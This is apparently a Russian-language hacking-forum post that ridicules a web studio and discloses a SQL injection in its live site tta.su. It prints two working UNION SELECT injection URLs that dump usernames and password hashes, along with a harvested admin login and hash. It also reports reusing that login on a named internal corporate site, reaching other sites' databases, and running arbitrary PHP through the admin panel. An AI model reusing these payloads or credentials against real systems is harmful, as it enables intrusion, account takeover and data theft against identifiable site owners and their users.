Очередная контора делающая сайты "лучше" других...

Была найдена бага в http://www.tta.su
Функци класса concat, hex etc.. не работают, поэтому:

http://www.tta.su/infusions/my_frends_panel/messages.php?msg_send=-1+union+select+1,user_name,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24+from+tennis_us ers+limit+0,10--

http://www.tta.su/infusions/my_frends_panel/messages.php?msg_send=-1+union+select+1,user_password,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24+from+tenni s_users+limit+0,10--

login:Sam_Fox pass:42e404a41193717e192856392b2b21b6

В данном случае, имеется доступ к нескольким базам, от разных сайтов.

Поковырявшись и пораскинув мозгом, было выявлено, что среди прочих там присутствуют:

bizedu.ru
tta.su
proftests.ru
...

proftests.ru <- внутренний корпоративный сайт всей этой гоп-компании(только длясотрудников сайт).

логин и пасс, которые мы поимели с tta.su(Sam_Fox) -> подходят(админовский акк, по крайней мере этот).

Есть возможность выполнения произвольного php кода, через "администрирование контента".